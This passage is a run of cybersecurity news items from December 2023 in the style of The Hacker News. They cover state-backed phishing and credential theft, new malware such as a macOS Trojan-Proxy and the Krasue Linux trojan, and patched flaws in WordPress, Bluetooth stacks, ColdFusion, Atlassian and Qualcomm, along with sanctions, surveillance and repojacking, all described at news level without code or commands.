The development comes as blockchain security company SlowMist implicated the notorious North Korea-backed outfit called the Lazarus Group in a widespread phishing campaign on Telegram targeting the cryptocurrency sector.
"More recently, these hackers have escalated their tactics by posing as reputable investment institutions to execute phishing scams against various cryptocurrency project teams," the Singapore-based firm said.
After establishing rapport, the targets are deceived into downloading a malicious script under the guise of sharing an online meeting link that facilitates crypto theft.
It also follows a report from the Seoul Metropolitan Police Agency (SMPA) that accused the Lazarus sub-cluster codenamed Andariel of stealing technical information about anti-aircraft weapon systems from domestic defense companies and laundering ransomware proceeds back to North Korea.
It is estimated that more than 250 files amounting to 1.2 terabytes have been stolen in the attacks. To cover up the tracks, the adversary is said to have used servers from a local company that "rents servers to subscribers with unclear identities" as an entry point.
In addition, the group extorted 470 million won ($356,000) worth of bitcoin from three South Korean firms in ransomware attacks and laundered them through virtual asset exchanges such as Bithumb and Binance. It's worth noting that Andariel has been linked to the deployment of Maui ransomware in the past.
Mac Users Beware: New Trojan-Proxy Malware Spreading via Pirated Software
9.12.23 OS The Hacker News
Unauthorized websites distributing trojanized versions of cracked software have been found to infect Apple macOS users with a new Trojan-Proxy malware.
"Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan said.
The Russian cybersecurity firm said it found evidence indicating that the malware is a cross-platform threat, owing to artifacts unearthed for Windows and Android that piggybacked on pirated tools.
The macOS variants propagate under the guise of legitimate multimedia, image editing, data recovery, and productivity tools. This suggests that users searching for pirated software are the targets of the campaign.
Unlike their genuine, unaltered counterparts, which are offered as disk image (.DMG) files, the rogue versions are delivered in the form of .PKG installers, which come equipped with a post-install script that activates the malicious behavior post installation.
"As an installer often requests administrator permissions to function, the script run by the installer process inherits those," Puzan noted.
The end goal of the campaign is to launch the Trojan-Proxy, which masks itself as the WindowServer process on macOS to evade detection. WindowServer is a core system process responsible for window management and rendering the graphical user interface (GUI) of applications.
Upon start, it attempts to obtain the IP address of the command-and-control (C2) server to connect to via DNS-over-HTTPS (DoH) by encrypting the DNS requests and responses using the HTTPS protocol.
Trojan-Proxy subsequently establishes contact with the C2 server and awaits further instructions, including processing incoming messages to parse the IP address to connect to, the protocol to use, and the message to send, signaling that its ability to act as a proxy via TCP or UDP to redirect traffic through the infected host.
Kaspersky said it found samples of the malware uploaded to the VirusTotal scanning engine as early as April 28, 2023. To mitigate such threats, users are recommended to avoid downloading software from untrusted sources.
WordPress Releases Update 6.4.2 to Address Critical Remote Attack Vulnerability
9.12.23 Vulnerebility The Hacker News
WordPress has released version 6.4.2 with a patch for a critical security flaw that could be exploited by threat actors by combining it with another bug to execute arbitrary PHP code on vulnerable sites.
"A remote code execution vulnerability that is not directly exploitable in core; however, the security team feels that there is a potential for high severity when combined with some plugins, especially in multisite installations," WordPress said.
According to WordPress security company Wordfence, the issue is rooted in the WP_HTML_Token class that was introduced in version 6.4 to improve HTML parsing in the block editor.
A threat actor with the ability to exploit a PHP object injection vulnerability present in any other plugin or theme to chain the two issues to execute arbitrary code and seize control of the targeted site.
"If a POP [property-oriented programming] chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code," Wordfence noted previously in September 2023.
In a similar advisory released by Patchstack, the company said an exploitation chain has been made available on GitHub as of November 17 and added to the PHP Generic Gadget Chains (PHPGGC) project. It's recommended that users manually check their sites to ensure that it's updated to the latest version.
"If you are a developer and any of your projects contain function calls to the unserialize function, we highly recommend you swap this with something else, such as JSON encoding/decoding using the json_encode and json_decode PHP functions," Patchstack CTO Dave Jong said.
Founder of Bitzlato Cryptocurrency Exchange Pleads Guilty in Money-Laundering Scheme
8.12.23 Cryptocurrency The Hacker News
The Russian founder of the now-defunct Bitzlato cryptocurrency exchange has pleaded guilty, nearly 11 months after he was arrested in Miami earlier this year.
Anatoly Legkodymov (aka Anatolii Legkodymov, Gandalf, and Tolik), according to the U.S. Justice Department, admitted to operating an unlicensed money-transmitting business that enabled other criminal actors to launder their illicit proceeds. He faces up to five years in prison.
"Legkodymov operated a cryptocurrency exchange that was open for business to money launderers and other criminals," said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department's Criminal Division.
"He profited from catering to criminals, and now he must pay the price. Transacting in cryptocurrency does not put you beyond the reach of the law."
Bitzlato, which served as a safe haven for fraudsters and ransomware crews such as Conti, is estimated to have received $2.5 billion in cryptocurrency between 2019 and 2023, more than half of which originated from illegal and risky sources.
Prior to its takedown by law enforcement, the Hong Kong-registered exchange also drew attention for its lax know-your-customer (KYC) procedures and marketed itself as a platform that required only minimal identifying information from its users. Some of its users are believed to have registered accounts using stolen identity documents.
The Justice Department also singled out the Hydra darknet marketplace as Bizlato's largest counterparty in cryptocurrency transactions, with the former's users exchanging no less than $700 million worth of digital assets with the exchange.
Hydra was the world's largest and longest-running dark web marketplace for narcotics, stolen financial information, fraudulent identification documents, and money laundering services. It was dismantled by German and U.S. authorities in April 2022.
"Legkodymov's guilty plea today confirms that he was well aware that Bitzlato, his cryptocurrency exchange, was being used like an open turnstile by criminals eager to take advantage of his lax controls over illicit money transactions," said U.S. Attorney Breon Peace for the Eastern District of New York.
Microsoft Warns of COLDRIVER's Evolving Evasion and Credential-Stealing Tactics
8.12.23 Hacking The Hacker News
The threat actor known as COLDRIVER has continued to engage in credential theft activities against entities that are of strategic interests to Russia while simultaneously improving its detection evasion capabilities.
The Microsoft Threat Intelligence team is tracking under the cluster as Star Blizzard (formerly SEABORGIUM). It's also called Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), and TA446.
The adversary "continues to prolifically target individuals and organizations involved in international affairs, defense, and logistics support to Ukraine, as well as academia, information security companies, and other entities aligning with Russian state interests," Redmond said.
Star Blizzard, linked to Russia's Federal Security Service (FSB), has a track record of setting up lookalike domains that impersonate the login pages of targeted companies. It's known to be active since at least 2017.
In August 2023, Recorded Future revealed 94 new domains that are part of the threat actor's attack infrastructure, most of which feature keywords related to information technology and cryptocurrency.
Microsoft said it observed the adversary leveraging server-side scripts to prevent automated scanning of the actor-controlled infrastructure starting April 2023, moving away from hCaptcha to determine targets of interest and redirecting the browsing session to the Evilginx server.
The server-side JavaScript code is designed to check if the browser has any plugins installed, if the page is being accessed by an automation tool like Selenium or PhantomJS, and transmit the results to the server in the form of a HTTP POST request.
"Following the POST request, the redirector server assesses the data collected from the browser and decides whether to allow continued browser redirection," Microsoft said.
"When a good verdict is reached, the browser receives a response from the redirection server, redirecting to the next stage of the chain, which is either an hCaptcha for the user to solve, or direct to the Evilginx server."
Also newly used by Star Blizzard are email marketing services like HubSpot and MailerLite to craft campaigns that serve as the starting point of the redirection chain that culminates at the Evilginx server hosting the credential harvesting page.
In addition, the threat actor has been observed using a domain name service (DNS) provider to resolve actor-registered domain infrastructure, sending password-protected PDF lures embedding the links to evade email security processes as well as host the files on Proton Drive.
That's not all. In a sign that the threat actor is actively keeping tabs on public reporting into its tactics and techniques, it has now upgraded its domain generation algorithm (DGA) to include a more randomized list of words when naming them.
Despite these changes, "Star Blizzard activities remain focused on email credential theft, predominantly targeting cloud-based email providers that host organizational and/or personal email accounts," Microsoft said.
"Star Blizzard remains constant in their use of pairs of dedicated VPSs to host actor-controlled infrastructure (redirector + Evilginx servers) used for spear-phishing activities, where each server usually hosts a separate actor registered domain."
U.K. and U.S. Sanction Two Members of Star Blizzard#
The development comes as the U.K. called out Star Blizzard for "sustained unsuccessful attempts to interfere in U.K. political processes" by targeting high-profile individuals and entities through cyber operations.
Besides linking Star Blizzard to Centre 18, a subordinate element within FSB, the U.K. government sanctioned two members of the hacking crew – Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets (aka Alexey Doguzhiev) – for their involvement in the spear-phishing campaigns.
The activity "resulted in unauthorized access and exfiltration of sensitive data, which was intended to undermine UK organizations and more broadly, the UK government," it said.
The Five Eyes intelligence alliance comprising Australia, Canada, New Zealand, the U.K., and the U.S. further highlighted the threat actor's pattern of impersonating known contacts' email accounts to appear trustworthy, creating fabricated social media profiles, and creating malicious domains that resemble legitimate organizations.
The spear-phishing attacks are preceded by a research and preparatory phase to conduct reconnaissance of their targets, before approaching them via their personal email addresses in a likely attempt to bypass security controls on corporate networks and build rapport in hopes of ultimately delivering links that mimic the sign-in page for a legitimate service.
"The sender address could be from any free email provider, but special attention should be paid to emails received from Proton account senders (@proton.me, @protonmail.com) as they are frequently used by Star Blizzard," Microsoft said.
The credentials entered by the targets on these pages are then captured and used to access the victims' emails and attachments, not to mention their contacts list, which are subsequently used for follow-on phishing activity via the compromised accounts.
In a newly unsealed indictment against Peretyatko and Korinets, the U.S. Department of Justice (DoJ) said the defendants used spoofed email accounts to send messages that purported to come from email providers suggesting the recipients had violated terms of service, but, in actuality, were engineered to trick them into providing their email account credentials to false login prompts.
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) implicated the FSB in long-running hack-and-leak operations with the goal of shaping narratives in targeted countries and advancing Russia's strategic interests.
It also accused Korinets of setting up at least 39 bogus credential harvesting domains for phishing campaigns between 2016 and 2020. Peretyatko is alleged to have used a fraudulent email account in 2017 to send phishing emails that redirected victims to a malicious domain created by Korinets.
"Peretyatko and other FSB officers responsible for the spear phishing campaigns have researched new tools that would support their malicious cyber activities," the Treasury Department said.
"One of the tools included malware that allows for the evasion of two-factor authentication, another permits for the control of a device with limited risk of detection, and a third that allows access to webmail inboxes."
The sanctions notwithstanding, the U.S. Department of State has also announced a $10 million reward for any information leading to the identification of Star Blizzard's members and their activities as part of its Rewards for Justice (RFJ) program.
Responding to the sanctions blockade, the Russian Embassy in the U.K. characterized it as a "futile move" and "yet another act of poorly staged drama," with President Vladimir Putin stating "Western elites use sanctions, provoking conflicts in whole macro-regions in an attempt to maintain their slipping domination."S
New Bluetooth Flaw Let Hackers Take Over Android, Linux, macOS, and iOS Devices
8.12.23 Exploit The Hacker News
A critical Bluetooth security flaw could be exploited by threat actors to take control of Android, Linux, macOS and iOS devices.
Tracked as CVE-2023-45866, the issue relates to a case of authentication bypass that enables attackers to connect to susceptible devices and inject keystrokes to achieve code execution as the victim.
"Multiple Bluetooth stacks have authentication bypass vulnerabilities that permit an attacker to connect to a discoverable host without user confirmation and inject keystrokes," said security researcher Marc Newlin, who disclosed the flaws to the software vendors in August 2023.
Specifically, the attack deceives the target device into thinking that it's connected to a Bluetooth keyboard by taking advantage of an "unauthenticated pairing mechanism" that's defined in the Bluetooth specification.
Successful exploitation of the flaw could permit an adversary in close physical proximity to connect to a vulnerable device and transmit keystrokes to install apps and run arbitrary commands.
It's worth pointing out that the attack does not require any specialized hardware, and can be performed from a Linux computer using a regular Bluetooth adapter. Additional technical details of the flaw are expected to be released in the future.
The vulnerability affects a wide range of devices running Android (going back to version 4.2.2, which was released in November 2012), iOS, Linux, and macOS.
Further, the bug affects macOS and iOS when Bluetooth is enabled and a Magic Keyboard has been paired with the vulnerable device. It also works in Apple's LockDown Mode, which is meant to secure against sophisticated digital threats.
In an advisory released this month, Google said CVE-2023-45866 "could lead to remote (proximal/adjacent) escalation of privilege with no additional execution privileges needed."
Governments May Spy on You by Requesting Push Notifications from Apple and Google
8.12.23 Phishing The Hacker News
Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden.
"Push notifications are alerts sent by phone apps to users' smartphones," Wyden said.
"These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of that structure, the two companies have visibility into how their customers use apps and could be compelled to provide this information to U.S. or foreign governments."
Wyden, in a letter to U.S. Attorney General Merrick Garland, said both Apple and Google confirmed receiving such requests but noted that information about the practice was restricted from public release by the U.S. government, raising questions about the transparency of legal demands they receive from governments.
When mobile apps for Android and iOS send push notifications to users' devices, they are routed through Apple and Google's own infrastructure known as the Apple Push Notification (APN) service and Firebase Cloud Messaging, respectively. Microsoft and Amazon have similar systems in place called Windows Push Notification Service (WNS) and Amazon Device Messaging (ADM).
As a result, the letter alleges that both companies can be compelled by governments to hand over the information. It's currently not clear which governments have sought notification data from Apple and Google.
That said, the U.S. is one among them, according to the Washington Post, which found more than two dozen search warrant applications related to federal requests for push notification data.
"The data these two companies receive includes metadata, detailing which app received a notification and when, as well as the phone and associated Apple or Google account to which that notification was intended to be delivered," the letter read.
"In certain instances, they also might also receive unencrypted content, which could range from backend directives for the app to the actual text displayed to a user in an app notification."
It also urged that Apple and Google should be permitted to disclose whether they have facilitated this practice, and if so, publish aggregate statistics about the number of demands they receive, and notify specific customers about demands for their data.
In a statement shared with Reuters, which first reported the development, Apple said the letter gave them the "opening" they needed to share more details about how governments monitored push notifications.
"When users allow an application they have installed to receive push notifications, an Apple Push Notification Service (APNs) token is generated and registered to that developer and device," Apple now notes in its updated Legal Process Guidelines document [PDF].
"Some apps may have multiple APNs tokens for one account on one device to differentiate between messages and multi-media. The Apple ID associated with a registered APNs token may be obtained with a subpoena or greater legal process."
Google, meanwhile, noted that it already publishes this information in its transparency reports although it's not specifically broken down by government requests for push notification records.
New Stealthy 'Krasue' Linux Trojan Targeting Telecom Firms in Thailand
7.12.23 Virus The Hacker News
A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to main covert access to victim networks at lease since 2021.
Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report shared with The Hacker News.
The exact initial access vector used to deploy Krasue is currently not known, although it's suspected that it could be via vulnerability exploitation, credential brute-force attacks, or downloaded as part of a bogus software package or binary. The scale of the campaign is
The malware's core functionalities are realized through a rootkit that allows it to maintain persistence on the host without attracting any attention. The rootkit is derived from open-source projects such as Diamorphine, Suterusu, and Rooty.
This has raised the possibility that Krasue is either deployed as part of a botnet or sold by initial access brokers to other cybercriminals, such as ransomware affiliates, who are looking to obtain access to a specific target.
"The rootkit can hook the `kill()` syscall, network-related functions, and file listing operations in order to hide its activities and evade detection," Group-IB malware analyst Sharmine Low said.
"Notably, Krasue uses RTSP (Real Time Streaming Protocol) messages to serve as a disguised 'alive ping,' a tactic rarely seen in the wild."
The trojan's command-and-control (C2) communications further allow it to designate a communicating IP as its master upstream C2 server, get information about the malware, and even terminate itself.
Krasue also shares several source code similarities with another Linux malware named XorDdos, indicating that it has been developed by the same author as the latter, or by actors who had access to its source code.
"The information available is not enough to put forward a conclusive attribution as to the creator of Krasue, or the groups that are leveraging it in the wild, but the fact that these malicious programs are able to remain under the radar for extended periods makes it clear that continuous vigilance and better security measures are necessary," Low said.
Meta Launches Default End-to-End Encryption for Chats and Calls on Messenger
7.12.23 Social The Hacker News
Meta has officially begun to roll out support for end-to-end encryption (E2EE) in Messenger for personal calls and one-to-one personal messages by default in what it called the "most significant milestone yet."
"This isn't a routine security update: we rebuilt the app from the ground up, in close consultation with privacy and safety experts," Loredana Crisan, vice president of Messenger at Meta, said in a post shared on X (formerly Twitter).
CEO Mark Zuckerberg, who announced a "privacy-focused vision for social networking" back in 2019, said the update comes "after years of work" redesigning the platform. It's worth noting that E2EE for group messaging in Messenger is still in the testing phase.
Encrypted chats were first introduced in Messenger as an opt-in feature called "secret conversations" in Messenger in 2016. Meta's Instagram also has support for E2EE for messages and calls but it's "only available in some areas" and not enabled by default.
"The extra layer of security provided by end-to-end encryption means that the content of your messages and calls with friends and family are protected from the moment they leave your device to the moment they reach the receiver's device," Crisan said.
In August 2023, the social media giant said that it was on track to widely enable the feature by the end of the year but emphasized that it had to re-architect Messenger to ensure that its servers cannot process or validate messages passing through them.
To that end, it not only upgraded over 100 features to incorporate encryption, but also developed new ways for users to manage their message history between devices, like setting up a PIN, by building a new encrypted storage system called Labyrinth.
The PIN is used as a recovery method post the chat upgrade in Messenger so as to help users restore their messages should they lose, change, or add a device to their account.
"Labyrinth – a novel encrypted message storage protocol – aims to address a number of these challenges by enabling users to store their messages server-side, while also maintaining strong privacy," the company said in a whitepaper.
"It is designed to protect messages against non-members (devices and entities which are not enrolled in a user's Labyrinth mailbox), including preventing new messages from being decryptable on revoked devices which may have previously had access to earlier messages, while achieving low operational overheads and high reliability."
Alert: Threat Actors Can Leverage AWS STS to Infiltrate Cloud Accounts
7.12.23 Hacking The Hacker News
Threat actors can take advantage of Amazon Web Services Security Token Service (AWS STS) as a way to infiltrate cloud accounts and conduct follow-on attacks.
The service enables threat actors to impersonate user identities and roles in cloud environments, Red Canary researchers Thomas Gardner and Cody Betsworth said in a Tuesday analysis.
AWS STS is a web service that enables users to request temporary, limited-privilege credentials for users to access AWS resources without needing to create an AWS identity. These STS tokens can be valid anywhere from 15 minutes to 36 hours.
Threat actors can steal long-term IAM tokens through a variety of methods like malware infections, publicly exposed credentials, and phishing emails, subsequently using them to determine roles and privileges associated with those tokens via API calls.
"Depending on the token's permission level, adversaries may also be able to use it to create additional IAM users with long-term AKIA tokens to ensure persistence in the event that their initial AKIA token and all of the ASIA short term tokens it generated are discovered and revoked," the researcher said.
In the next stage, an MFA-authenticated STS token is used to create multiple new short-term tokens, followed by conducting post-exploitation actions such as data exfiltration.
To mitigate such AWS token abuse, it's recommended to log CloudTrail event data, detect role-chaining events and MFA abuse, and rotate long-term IAM user access keys.
"AWS STS is a critical security control for limiting the use of static credentials and the duration of access for users across their cloud infrastructure," the researchers said.
"However, under certain IAM configurations that are common across many organizations, adversaries can also create and abuse these STS tokens to access cloud resources and perform malicious actions."
Sierra:21 - Flaws in Sierra Wireless Routers Expose Critical Sectors to Cyber Attacks
7.12.23 Vulnerebility The Hacker News
A collection of 21 security flaws have been discovered in Sierra Wireless AirLink cellular routers and open-source software components like TinyXML and OpenNDS.
Collectively tracked as Sierra:21, the issues expose over 86,000 devices across critical sectors like energy, healthcare, waste management, retail, emergency services, and vehicle tracking to cyber threats, according to Forescout Vedere Labs. A majority of these devices are located in the U.S., Canada, Australia, France, and Thailand.
"These vulnerabilities may allow attackers to steal credentials, take control of a router by injecting malicious code, persist on the device and use it as an initial access point into critical networks," the industrial cybersecurity company said in a new analysis.
Of the 21 vulnerabilities, one is rated critical, nine are rated high, and 11 are rated medium in severity.
This includes remote code execution (RCE), cross-site scripting (XSS), denial-of-service (DoS), unauthorized access, and authentication bypasses that could be exploited to seize control of vulnerable devices, conduct credential theft via injection of malicious JavaScript, crash the management application, amd conduct adversary-in-the-middle (AitM) attacks.
These shortcomings can also be weaponized by botnet malware for worm-like automatic propagation, communication with command-and-control (C2) servers, and enslaving affected susceptible machines to launch DDoS attacks.
Fixes for the flaws have been released in ALEOS 4.17.0 (or ALEOS 4.9.9), and OpenNDS 10.1.3. TinyXML, on the other hand, is no longer actively maintained, necessitating that the problems be addressed downstream by affected vendors.
"Attackers could leverage some of the new vulnerabilities to take full control of an OT/IoT router in critical infrastructure and achieve different goals such as network disruption, espionage, lateral movement and further malware deployment," Forescout said.
"Vulnerabilities impacting critical infrastructure are like an open window for bad actors in every community. State-sponsored actors are developing custom malware to use routers for persistence and espionage. Cybercriminals are also leveraging routers and related infrastructure for residential proxies and to recruit into botnets."
Hackers Exploited ColdFusion Vulnerability to Breach Federal Agency Servers
7.12.23 Incindent The Hacker News
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of a high-severity Adobe ColdFusion vulnerability by unidentified threat actors to gain initial access to government servers.
"The vulnerability in ColdFusion (CVE-2023-26360) presents as an improper access control issue and exploitation of this CVE can result in arbitrary code execution," CISA said, adding an unnamed federal agency was targeted between June and July 2023.
The shortcoming affects ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, released on March 14, 2023, respectively.
It was added by CISA to the Known Exploited Vulnerabilities (KEV) catalog a day later, citing evidence of active exploitation in the wild. Adobe, in an advisory released around that time, said it's aware of the flaw being "exploited in the wild in very limited attacks."
The agency noted that at least two public-facing servers were compromised using the flaw, both of which were running outdated versions of the software.
"Additionally, various commands were initiated by the threat actors on the compromised web servers; the exploited vulnerability allowed the threat actors to drop malware using HTTP POST commands to the directory path associated with ColdFusion," CISA noted.
There is evidence to suggest that the malicious activity is a reconnaissance effort carried out to map the broader network, although no lateral movement or data exfiltration has been observed.
In one of the incidents, the adversary was observed traversing the filesystem and uploading various artifacts to the web server, including binaries that are capable of exporting web browser cookies as well as malware designed to decrypt passwords for ColdFusion data sources.
A second event recorded in early June 2023 entailed the deployment of a remote access trojan that's a modified version of the ByPassGodzilla web shell and "utilizes a JavaScript loader to infect the device and requires communication with the actor-controlled server to perform actions."
Also undertaken by the adversary were attempts to exfiltrate the Windows Registry files as well as unsuccessfully download data from a command-and-control (C2) server.
"During this incident, analysis strongly suggests that the threat actors likely viewed the data contained in the ColdFusion seed.properties file via the web shell interface," CISA said.
"The seed.properties file contains the seed value and encryption method used to encrypt passwords. The seed values can also be used to decrypt passwords. No malicious code was found on the victim system to indicate the threat actors attempted to decode any passwords using the values found in seed.properties file."
Atlassian Releases Critical Software Fixes to Prevent Remote Code Execution
7.12.23 Vulnerebility The Hacker News
Atlassian has released software fixes to address four critical flaws in its software that, if successfully exploited, could result in remote code execution.
The list of vulnerabilities is below -
CVE-2022-1471 (CVSS score: 9.8) - Deserialization vulnerability in SnakeYAML library that can lead to remote code execution in multiple products
CVE-2023-22522 (CVSS score: 9.0) - Remote code execution vulnerability in Confluence Data Center and Confluence Server (affects all versions including and after 4.0.0)
CVE-2023-22523 (CVSS score: 9.8) - Remote code execution vulnerability in Assets Discovery for Jira Service Management Cloud, Server, and Data Center (affects all versions up to but not including 3.2.0-cloud / 6.2.0 data center and server)
CVE-2023-22524 (CVSS score: 9.6) - Remote code execution vulnerability in Atlassian Companion app for macOS (affects all versions up to but not including 2.0.0)
Atlassian described CVE-2023-22522 as a template injection flaw that allows an authenticated attacker, including one with anonymous access, to inject unsafe user input into a Confluence page, resulting in code execution.
The Assets Discovery flaw allows an attacker to perform privileged remote code execution on machines with the Assets Discovery agent installed, whereas CVE-2023-22524 could permit an attacker to achieve code execution by utilizing WebSockets to bypass Atlassian Companion's blocklist and macOS Gatekeeper protections.
The advisory comes nearly a month after the Australian software company revealed all versions of its Bamboo Data Center and Server products are impacted by an actively exploited critical security flaw in Apache ActiveMQ (CVE-2023-46604, CVSS score: 10.0). Fixes have been released in versions 9.2.7, 9.3.5, and 9.4.1 or later.
With Atlassian products becoming lucrative attack vectors in recent years, it's highly recommended that users move quickly to update affected installations to a patched version.
Qualcomm Releases Details on Chip Vulnerabilities Exploited in Targeted Attacks
6.12.23 Vulnerebility The Hacker News
Chipmaker Qualcomm has released more information about three high-severity security flaws that it said came under "limited, targeted exploitation" back in October 2023.
The vulnerabilities are as follows -
CVE-2023-33063 (CVSS score: 7.8) - Memory corruption in DSP Services during a remote call from HLOS to DSP.
CVE-2023-33106 (CVSS score: 8.4) - Memory corruption in Graphics while submitting a large list of sync points in an AUX command to the IOCTL_KGSL_GPU_AUX_COMMAND.
CVE-2023-33107 (CVSS score: 8.4) - Memory corruption in Graphics Linux while assigning shared virtual memory region during IOCTL call.
Google's Threat Analysis Group and Google Project Zero revealed back in October 2023 that the three flaws, along with CVE-2022-22071 (CVSS score: 8.4), have been exploited in the wild as part of limited, targeted attacks.
A security researcher named luckyrb, the Google Android Security team, and TAG researcher Benoît Sevens and Jann Horn of Google Project Zero have been credited with reporting the security vulnerabilities, respectively.
It's currently not known how these shortcomings have been weaponized, and who are behind the attacks.
The development, however, has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the four bugs to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to apply the patches by December 26, 2023.
It also follows Google's announcement that the December 2023 security updates for Android address 85 flaws, including a critical issue in the System component tracked as CVE-2023-40088 that "could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed" and without any user interaction.
Warning for iPhone Users: Experts Warn of Sneaky Fake Lockdown Mode Attack
6.12.23 OS The Hacker News
A new "post-exploitation tampering technique" can be abused by malicious actors to visually deceive a target into believing that their Apple iPhone is running in Lockdown Mode when it's actually not and carry out covert attacks.
The novel method, detailed by Jamf Threat Labs in a report shared with The Hacker News, "shows that if a hacker has already infiltrated your device, they can cause Lockdown Mode to be 'bypassed' when you trigger its activation."
In other words, the goal is to implement Fake Lockdown Mode on a device that's compromised by an attacker through other means, such as unpatched security flaws that can trigger execution of arbitrary code.
Lockdown Mode, introduced by Apple last year with iOS 16, is an enhanced security measure that aims to safeguard high-risk individuals from sophisticated digital threats such as mercenary spyware by minimizing the attack surface.
What it doesn't do is prevent the execution of malicious payloads on a compromised device, thereby allowing a trojan deployed on it to manipulate Lockdown Mode and give users an illusion of security.
"In the case of an infected phone, there are no safeguards in place to stop the malware from running in the background, whether the user activates Lockdown Mode or not," security researchers Hu Ke and Nir Avraham said.
The fake Lockdown Mode is accomplished by hooking functions – e.g., setLockdownModeGloballyEnabled, lockdownModeEnabled, and isLockdownModeEnabledForSafari – that are triggered upon activating the setting so as to create a file called "/fakelockdownmode_on" and initiate a userspace reboot, which terminates all processes and restarts the system without touching the kernel.
This also means that a piece of malware implanted on the device sans any persistence mechanism will continue to exist even after a reboot of this kind and surreptitiously spy on its users.
What's more, an adversary could alter the Lockdown Mode on the Safari web browser to make it possible to view PDF files, which are otherwise blocked when the setting is turned on.
"Since iOS 17, Apple has elevated Lockdown Mode to kernel level," the researchers said. "This strategic move is a great step in enhancing security, as changes made by Lockdown Mode in the kernel typically cannot be undone without undergoing a system reboot, thanks to existing security mitigations."
The disclosure from Jamf arrives nearly four months after it demonstrated another novel method on iOS 16 that could be abused to fly under the radar and maintain access to an Apple device by tricking the victim into thinking their device's Airplane Mode is enabled.
Russia's AI-Powered Disinformation Operation Targeting Ukraine, U.S., and Germany
6.12.23 BigBrothers The Hacker News
The Russia-linked influence operation called Doppelganger has targeted Ukrainian, U.S., and German audiences through a combination of inauthentic news sites and social media accounts.
These campaigns are designed to amplify content designed to undermine Ukraine as well as propagate anti-LGBTQ+ sentiment, U.S. military competence, and Germany's economic and social issues, according to a new report shared with The Hacker News.
Doppelganger, described by Meta as the "largest and the most aggressively-persistent Russian-origin operation," is a pro-Russian network known for spreading anti-Ukrainian propaganda. Active since at least February 2022, it has been linked to two companies named Structura National Technologies and Social Design Agency.
Activities associated with the influence operation are known to leverage manufactured websites as well as those impersonating authentic media – a technique called brandjacking – to disseminate adversarial narratives.
The latest campaigns are also characterized by the use of advanced obfuscation techniques, including "manipulating social media thumbnails and strategic first and second-stage website redirects to evade detection, and the likely use of generative artificial intelligence (AI) to create inauthentic news articles," the cybersecurity firm said.
The findings demonstrate Doppelgänger's evolving tactics and throw light on the use of AI for information warfare and to produce scalable influence content.
The campaign targeting Ukraine is said to consist of more than 800 social media accounts, in addition to banking on first and second-stage domains to conceal the true destination. Some of these links also use the Keitaro Traffic Distribution System (TDS) to assess the overall success and effectiveness of the campaign.
One of the notable aspects of the U.S. and German campaigns is the use of inauthentic media outlets such as Election Watch, MyPride, Warfare Insider, Besuchszweck, Grenzezank, and Haüyne Scherben that publish malign content as original news and opinion outlets.
"Doppelgänger exemplifies the enduring, scalable, and adaptable nature of Russian information warfare, demonstrating strategic patience aimed at gradually shifting public opinion and behavior," Recorded Future said.
It's worth pointing out that Meta, in its quarterly Adversarial Threat Report published last week, said it also found a new cluster of websites linked to Doppelganger that are geared towards U.S. and European political affairs, such as migration and border security.
"Their latest web content appears to have been copy-pasted from mainstream U.S. news outlets and altered to question U.S. democracy and promote conspiratorial themes," Meta said, highlighting Election Watch as one of the U.S.-focused sites.
"Soon after the Hamas terrorist attack in Israel [in October 2023], we saw these websites begin posting about the crisis in the Middle East as a proof of American decline; and at least one website claimed Ukraine supplied Hamas with weapons."
Meta also said it took steps to disrupt three separate covert influence operations – two from China and one from Russia – during the third quarter of 2023 that leveraged fictitious personas and media brands to target audiences in India and the U.S., and share content about Russia's invasion of Ukraine.
It, however, noted that proactive threat sharing by the federal government in the U.S. related to foreign election interference has been paused since July 2023, cutting off a key source of information that could be valuable to disrupt malicious foreign campaigns by sophisticated threat actors.
15,000 Go Module Repositories on GitHub Vulnerable to Repojacking Attack
6.12.23 Attack The Hacker News
New research has found that over 15,000 Go module repositories on GitHub are vulnerable to an attack called repojacking.
"More than 9,000 repositories are vulnerable to repojacking due to GitHub username changes," Jacob Baines, chief technology officer at VulnCheck, said in a report shared with The Hacker News. "More than 6,000 repositories were vulnerable to repojacking due to account deletion."
Collectively, these repositories account for no less than 800,000 Go module-versions.
Repojacking, a portmanteau of "repository" and "hijacking," is an attack technique that allows a bad actor to take advantage of account username changes and deletions to create a repository with the same name and the pre-existing username to stage open-source software supply chain attacks.
Earlier this June, cloud security firm Aqua revealed that millions of software repositories on GitHub are likely vulnerable to the threat, urging organizations that undergo name changes to ensure that they still own their previous name as placeholders to prevent such abuse.
Modules written in the Go programming language are particularly susceptible to repojacking as unlike other package manager solutions like npm or PyPI, they are decentralized due to the fact that they get published to version control platforms like GitHub or Bitbucket.
"Anyone can then instruct the Go module mirror and pkg.go.dev to cache the module's details," Baines said. "An attacker can register the newly unused username, duplicate the module repository, and publish a new module to proxy.golang.org and go.pkg.dev."
To prevent developers from pulling down potentially unsafe packages, GitHub has in place a countermeasure called popular repository namespace retirement that blocks attempts to create repositories with the names of retired namespaces that have been cloned more than 100 times prior to the owners' accounts being renamed or deleted.
But VulnCheck noted that this protection isn't helpful when it comes to Go modules as they are cached by the module mirror, thereby obviating the need for interacting with or cloning a repository. In other words, there could be popular Go-based modules that have been cloned less than 100 times, resulting in a bypass of sorts.
"Unfortunately, mitigating all of these repojackings is something that either Go or GitHub will have to take on," Baines said. "A third-party can't reasonably register 15,000 GitHub accounts. Until then, it's important for Go developers to be aware of the modules they use, and the state of the repository that the modules originated from."
